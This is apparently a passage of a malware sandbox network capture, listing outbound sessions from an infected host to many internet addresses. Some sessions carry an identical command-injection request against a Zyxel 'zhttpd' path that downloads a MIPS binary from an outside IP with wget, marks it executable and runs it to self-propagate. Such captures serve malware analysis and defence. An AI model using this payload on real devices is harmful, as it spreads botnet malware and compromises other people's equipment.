                                                Jan 12, 2024 18:24:56.360945940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9575192.168.2.1345890179.43.203.179443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.360970020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9576192.168.2.1351736130.9.63.219443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361032963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9577192.168.2.134706296.140.15.28443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361085892 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9578192.168.2.1350578209.10.105.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361102104 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9579192.168.2.1347092135.42.109.73443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361146927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9580192.168.2.133751851.183.94.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361188889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9581192.168.2.1332976151.158.230.87443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361232042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9582192.168.2.1353312197.22.100.190443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361287117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9583192.168.2.1349650206.88.134.181443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361310005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9584192.168.2.13483789.19.102.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361367941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9585192.168.2.1357414147.215.252.45443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361413002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9586192.168.2.1351306149.74.142.212443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361474991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9587192.168.2.134490668.29.147.145443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361532927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9588192.168.2.135346281.213.225.26443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361572027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9589192.168.2.135238898.58.46.93443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361593962 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9590192.168.2.135718868.132.196.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361638069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9591192.168.2.1346702151.195.200.171443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361700058 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9592192.168.2.1338322207.140.103.228443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361730099 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9593192.168.2.1337894181.183.87.241443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:24:56.361773014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9594192.168.2.13520068.36.85.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9595192.168.2.1339188120.81.58.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9596192.168.2.1350338175.163.116.198443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9597192.168.2.135631457.161.52.65443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9598192.168.2.1360902140.61.22.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9599192.168.2.13490902.184.154.84443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9600192.168.2.1337786189.163.40.249443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9601192.168.2.1353336128.255.205.215443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9602192.168.2.1337106198.244.228.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9603192.168.2.1347616207.72.162.133443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9604192.168.2.133825036.22.133.38443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9605192.168.2.1358394159.240.93.211443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9606192.168.2.1340864199.23.173.248443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9607192.168.2.135761852.118.211.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9608192.168.2.134685465.184.129.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9609192.168.2.133808298.253.6.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9610192.168.2.135804694.70.90.80443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9611192.168.2.1352362152.75.253.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9612192.168.2.133496858.37.118.166443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9613192.168.2.1352002201.217.95.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9614192.168.2.1345460223.38.93.250443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9615192.168.2.1342290221.142.7.223443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9616192.168.2.1358846136.93.133.207443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9617192.168.2.1352116168.49.235.190443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9618192.168.2.1335228106.251.174.209443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9619192.168.2.1358110189.70.242.89443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9620192.168.2.1340824145.139.104.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9621192.168.2.1338772183.136.244.76443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9622192.168.2.134661243.199.201.56443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9623192.168.2.1348354132.48.161.15443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9624192.168.2.1336646217.30.9.83443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9625192.168.2.133511263.177.94.120443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9626192.168.2.1351126139.238.252.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9627192.168.2.134668047.142.8.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9628192.168.2.134649063.182.202.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9629192.168.2.1360196155.193.82.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9630192.168.2.1355514222.23.190.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9631192.168.2.1339582112.78.69.112443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9632192.168.2.1359006201.71.54.63443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9633192.168.2.1334142185.163.161.154443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9634192.168.2.135984647.174.106.87443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9635192.168.2.135646494.9.56.167443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9636192.168.2.135428445.182.49.2443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9637192.168.2.136076632.65.46.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9638192.168.2.134758844.117.205.204443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9639192.168.2.1356118210.251.111.202443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9640192.168.2.135549090.188.197.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9641192.168.2.1340620196.4.231.7443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9642192.168.2.1333048178.35.72.57443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9643192.168.2.134753212.177.3.61443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9644192.168.2.133708654.111.189.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9645192.168.2.1340046165.176.218.73443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9646192.168.2.135104214.217.214.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9647192.168.2.1350330133.124.240.111443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9648192.168.2.1360262168.31.135.48443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9649192.168.2.1352544144.132.94.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9650192.168.2.1334142172.161.145.178443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9651192.168.2.133760084.118.92.236443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9652192.168.2.1355168206.111.142.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9653192.168.2.134060877.134.59.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9654192.168.2.1353564192.149.49.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9655192.168.2.1354808152.218.137.158443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9656192.168.2.1349750104.137.97.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9657192.168.2.133635690.124.72.26443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9658192.168.2.1360124122.26.246.139443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9659192.168.2.13556649.51.124.17443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9660192.168.2.135866495.51.241.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9661192.168.2.133857274.150.171.208443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9662192.168.2.1350392164.131.165.105443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9663192.168.2.133969472.243.55.49443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9664192.168.2.13368984.221.21.54443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9665192.168.2.1333446182.76.222.201443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9666192.168.2.1334634157.245.150.251443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9667192.168.2.135262882.37.153.75443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9668192.168.2.1348518173.41.101.194443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9669192.168.2.135489851.43.53.147443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9670192.168.2.1346704170.66.194.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9671192.168.2.1340562137.23.121.153443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9672192.168.2.1353382122.230.17.100443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9673192.168.2.1347072103.223.103.24443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9674192.168.2.134653677.179.31.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9675192.168.2.134411041.241.21.237443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9676192.168.2.134487098.187.46.78443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9677192.168.2.134334868.40.185.69443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9678192.168.2.1335560169.238.4.3443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9679192.168.2.1336444164.103.181.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9680192.168.2.1347374100.207.254.74443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9681192.168.2.1348494212.93.175.121443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9682192.168.2.1346226103.154.143.10443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9683192.168.2.1345094111.230.21.107443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9684192.168.2.134318880.125.169.125443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9685192.168.2.134127074.38.168.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9686192.168.2.1359778194.185.87.239443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9687192.168.2.1348552195.128.89.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9688192.168.2.1349098197.78.40.72443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9689192.168.2.1359112118.146.164.28443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9690192.168.2.133543825.217.135.155443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9691192.168.2.135688276.35.159.21443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9692192.168.2.1343536173.125.252.254443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9693192.168.2.13442328.198.239.182443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9694192.168.2.134952872.30.37.150443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9695192.168.2.1360234167.61.182.183443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9696192.168.2.1341686181.37.242.132443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9697192.168.2.135751859.134.96.43443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9698192.168.2.134621062.157.121.70443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9699192.168.2.133825652.253.195.118443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9700192.168.2.1351448189.25.83.92443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9701192.168.2.1339190125.154.229.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9702192.168.2.1356810166.207.199.123443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9703192.168.2.1350302177.251.24.9443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9704192.168.2.1346600152.44.150.214443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9705192.168.2.134909449.41.171.244443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9706192.168.2.1343184146.79.9.117443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9707192.168.2.1358652184.30.81.200443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9708192.168.2.1332812131.153.137.40443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9709192.168.2.135514475.183.214.128443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9710192.168.2.135718024.99.69.176443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9711192.168.2.135375665.68.136.206443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9712192.168.2.134210043.251.23.242443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9713192.168.2.133348454.185.179.234443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9714192.168.2.1347076115.158.207.148443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9715192.168.2.135639445.7.184.231443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9716192.168.2.134939450.176.133.152443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9717192.168.2.1340790209.17.20.98443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9718192.168.2.13389121.80.194.219443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9719192.168.2.135067218.176.214.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9720192.168.2.133945423.56.180.51443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9721192.168.2.1355392133.8.150.108443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9722192.168.2.135706838.57.131.240443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9723192.168.2.1357470101.207.42.96443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9724192.168.2.134923481.151.131.127443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9725192.168.2.133913213.195.143.35443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9726192.168.2.135908289.30.67.140443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9727192.168.2.1333978205.209.5.31443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9728192.168.2.133695818.121.57.171443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9729192.168.2.1348036181.124.49.230443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9730192.168.2.1351792137.93.163.8443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9731192.168.2.133422658.255.193.6443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9732192.168.2.1335482213.79.249.238443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9733192.168.2.134582881.17.23.50443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9734192.168.2.1340132208.236.156.22443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9735192.168.2.1344500166.157.0.179443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9736192.168.2.1358978223.119.29.13443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9737192.168.2.1344570142.120.205.160443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9738192.168.2.134074093.128.94.187443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9739192.168.2.1351644223.92.163.60443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9740192.168.2.1337520181.17.201.30443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9741192.168.2.1339766176.145.235.195443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9742192.168.2.1350386159.125.134.130443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9743192.168.2.1356244124.58.126.67443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9744192.168.2.1341708152.214.183.144443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9745192.168.2.133661844.90.32.199443
                                                TimestampBytes transferredDirectionData


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9746192.168.2.1359174200.61.233.142443
